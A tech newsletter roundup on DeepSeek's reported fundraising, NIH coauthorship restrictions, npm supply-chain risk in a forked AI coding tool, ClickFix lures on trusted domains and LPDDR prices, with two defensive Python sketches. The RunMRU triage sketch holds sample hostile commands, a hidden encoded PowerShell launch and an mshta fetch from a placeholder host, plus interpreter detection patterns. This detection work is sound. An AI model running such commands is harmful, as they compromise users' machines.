Today’s through-line is control. DeepSeek is reportedly trying to prove that open models and serious capital can coexist, while NIH, npm maintainers, and security teams are all dealing with the opposite problem: who gets to publish, push updates, or borrow institutional trust at scale.
A reported $10 billion round, with caveats

Bloomberg Law reported on May 22 that DeepSeek is advancing a 70 billion yuan, about $10 billion, financing round, and that founder Liang Wenfeng told investors the company would keep developing open-source AI models while pursuing AGI. That would be a large statement of intent, not just a large check. The catch is that DeepSeek has not publicly confirmed the round on its official channels, so the headline claim still rests on third-party reporting.
Earlier coverage points to a moving target, not a settled number. CnTechPost, citing The Information on May 8, said DeepSeek was seeking up to 50 billion yuan, or $7.35 billion; TechCrunch reported on May 6 that the company’s prospective valuation had risen from $20 billion to $45 billion in a few weeks. The clean read is not that DeepSeek has closed a $10 billion round. It is that the fundraising story is expanding quickly, while observers are already drawing a harder line on proof: not investor rhetoric, but whether DeepSeek keeps releasing useful open weights at that pace.
NIH restrictions appear to reach into publication

The most consequential part of the U.S. research-security push may now be happening through grant administration rather than public rulemaking. Inside Higher Ed, summarizing Science’s reporting on May 22, said NIH officials have told some grantees to seek advance permission for co-authorship with a scholar affiliated with a foreign institution, even when the work was done in the United States. The same report said NIH ordered grantees to remove from annual progress reports publications with foreign-affiliated coauthors if NIH had not previously approved a foreign component for the grant.
There is official policy underneath this, but not a public agency notice matching the coauthor language. NIH’s May 1, 2025 notice said it would no longer issue awards that include a foreign subaward under the parent grant, and would no longer accept requests to add a new foreign component or subaward to an ongoing project, according to the NIH grants notice. A later NIH notice on September 12, 2025 said the agency still supports international collaborations, but through new PF5/UF5 mechanisms. The key detail is on an NIH NINDS guidance page, which says collaborations with investigators at a foreign site anticipated to result in co-authorship may qualify as a foreign component.
NIH’s public posture is narrower than the alarmed interpretation. Per Inside Higher Ed, an NIH spokesperson said a recent update to IDeA grantees was a clarification of longstanding policy, not a new directive, and that IDeA funding has always barred foreign institutions and foreign components. That may be true programmatically, but it does not make the effect smaller. STAT reported on March 27 that 25% of nearly 1,000 NIH-supported scientists surveyed said the foreign-subaward shift had affected their research a great deal or a fair amount, and another 20% said they were affected a little. Science works on co-authorship first and compliance diagrams second. The agencies seem to be trying the reverse.
A viral coding tool becomes an npm warning

A popular AI coding tool is now a supply-chain cautionary tale. The maintainer of open-gsd/get-shit-done-redux wrote on GitHub on May 22 that the original GSD project had been abandoned after an apparent crypto rug pull, and that the community had forked the codebase to keep it alive. The bigger issue is control of distribution. The warning that drove the story says the original creator still has publish access to the old npm packages, which means a future update could turn a widely installed coding agent into a backdoor on developer machines with shell access.
The replacement project has at least done the obvious hygiene. In its Security Audit Transparency Report dated 2026-05-22, the new team said it found no confirmed active exfiltration payload in the tracked source during that pass, reported 0 known vulnerabilities in the root and SDK at scan time, and said its security tests passed 293 out of 293. That is useful, but it is not the whole risk model. The old package line is the problem, because trust in agent tooling is less about one repo snapshot than about who can ship the next update. AI coding agents ask for deep local permissions. npm has always been a supply-chain problem; now the package also talks back.
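
The point about who can ship the next update can be checked against a project's own lockfile. The sketch below is an added example, not code from the newsletter or from either GSD project: it walks a parsed `package-lock.json` (lockfileVersion 2 or 3 layout) and reports where a watched package is installed and which dependents declare it with a range that would accept a newer publish. The package name is a placeholder, because the page does not name the legacy npm package, and the lockfile content is constructed.

```python
import re

# Placeholder: the page does not name the legacy npm package; this is not a real name.
WATCHED = {"placeholder-legacy-agent"}
# Only a bare x.y.z (optionally with a prerelease tag) counts as an exact pin.
EXACT = re.compile(r"^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$")
DEP_FIELDS = ("dependencies", "devDependencies", "optionalDependencies")

# Constructed package-lock.json content (already parsed from JSON).
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"helper-cli": "1.4.0"}},
        "node_modules/helper-cli": {
            "version": "1.4.0",
            "integrity": "sha512-CONSTRUCTED",
            "dependencies": {"placeholder-legacy-agent": "^2.1.0"},
        },
        "node_modules/placeholder-legacy-agent": {"version": "2.1.3"},
    },
}


def audit_lock(lock, watched=WATCHED):
    """List installed copies of watched packages and every range that declares them."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        # "node_modules/a/node_modules/@scope/b" -> "@scope/b"
        name = path.rsplit("node_modules/", 1)[-1]
        if path and name in watched:
            findings.append({"kind": "installed", "where": path,
                             "version": meta.get("version"),
                             "integrity": "integrity" in meta})
        for field in DEP_FIELDS:
            for dep, spec in meta.get(field, {}).items():
                if dep in watched:
                    # A caret, tilde, star or tag follows whatever is published next.
                    findings.append({"kind": "declared", "where": path or "<root>",
                                     "spec": spec,
                                     "floating": EXACT.match(spec) is None})
    return findings
```

A floating range only takes effect when the lockfile is regenerated or bypassed, so global and `npx`-style installs of the old package line need a separate check.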
Real domains are now part of the malware pitch

A widely shared report alleged that roughly 140 legitimate websites, including pages on Harvard International Review, were being used to deliver ClickFix prompts. That count is not broadly confirmed, and Harvard’s public materials reviewed here do not confirm a compromise. AI Weekly reported the Harvard-linked pages and the 140-site figure, but the firmer point is narrower and more useful: the alleged examples were real, trusted domains, not obvious spoofs.
The mechanism matters more than the headline. Huntress explains that ClickFix is a social-engineering technique in which victims are told to open the Windows Run box, paste clipboard contents, and execute them, and that delivery can happen through compromised websites as well as phishing. That also corrects a common shorthand: ClickFix is not one malware family. It is a way to get users to run whatever payload the operator wants. The useful security assumption that a trusted domain buys you safety is getting weaker. In decentralized environments, especially universities with lots of third-level or outsourced sites, it was not especially strong to begin with.
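
Because the technique runs through the Windows Run box, the per-user RunMRU registry key that records Run-box history is a natural place to look during triage. The following is an added detection sketch, not code from Huntress or from the original newsletter: it takes exported RunMRU values and flags entries where a script interpreter was launched with a URL, an encoded argument, or a hidden window. The sample values, the interpreter list, and the length threshold are constructed assumptions.

```python
import re

# Constructed sample of values under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (name -> data).
# Each entry ends in "\1"; MRUList orders the value names newest first.
SAMPLE_RUNMRU = {
    "MRUList": "edcba",
    "a": r"notepad\1",
    "b": r"\\fileserver\share\1",
    "c": r"cmd\1",
    "d": r"powershell -w hidden -enc BASE64_PLACEHOLDER\1",
    "e": r"mshta https://example.invalid/verify\1",
}
INTERPRETERS = {"powershell", "pwsh", "cmd", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "msiexec", "curl", "certutil"}
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "encoded_arg": re.compile(r"\s-e(nc|ncodedcommand|c)?\s", re.I),
    "hidden_window": re.compile(r"\s-w(indowstyle)?\s+h", re.I),
}
MAX_TYPED_LEN = 120  # assumption: entries typed by hand are short


def first_program(command):
    """Return the launched program's base name, lower-cased, without .exe."""
    match = re.match(r'\s*"?([^"\s]+)', command)
    if not match:
        return ""
    name = re.split(r"[\\/]", match.group(1))[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def triage_runmru(values):
    """Flag entries where an interpreter is started with a paste-like argument."""
    findings = []
    for name in values.get("MRUList", ""):
        data = values.get(name, "")
        command = data[:-2] if data.endswith("\\1") else data
        reasons = [label for label, rx in INDICATORS.items() if rx.search(command)]
        if len(command) > MAX_TYPED_LEN:
            reasons.append("long_entry")
        program = first_program(command)
        # A bare "cmd" or "powershell" is normal admin use; require an indicator too.
        if program in INTERPRETERS and reasons:
            findings.append({"value": name, "program": program, "reasons": reasons})
    return findings
```

An empty result does not clear a host, since the key holds only a short per-user history that can be cleared.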
LPDDR gets pulled into the data center

The AI memory squeeze is no longer confined to HBM. Official materials from Micron and Samsung show LPDDR5X and SOCAMM2 being positioned for AI infrastructure, not just phones and thin laptops, while Samsung’s 1Q 2026 earnings deck says it plans to expand the share of high-value-added AI products amid limited supply and industry-wide price increases. That is the supply-side story in plain English: memory makers are following margin.
The downstream effect is now visible. TrendForce said on May 14 that LPDDR4X average selling prices in 2Q26 were up 70% to 75% quarter over quarter, and LPDDR5X was up 78% to 83%. IDC said some new devices will ship with less memory than consumers are used to at the same price points, which is the more likely form of repricing. The sticker does not always move first. The spec sheet gets thinner.
The common theme is not AI magic. It is gatekeeping, over capital, dependencies, infrastructure, and who is allowed in the author list.
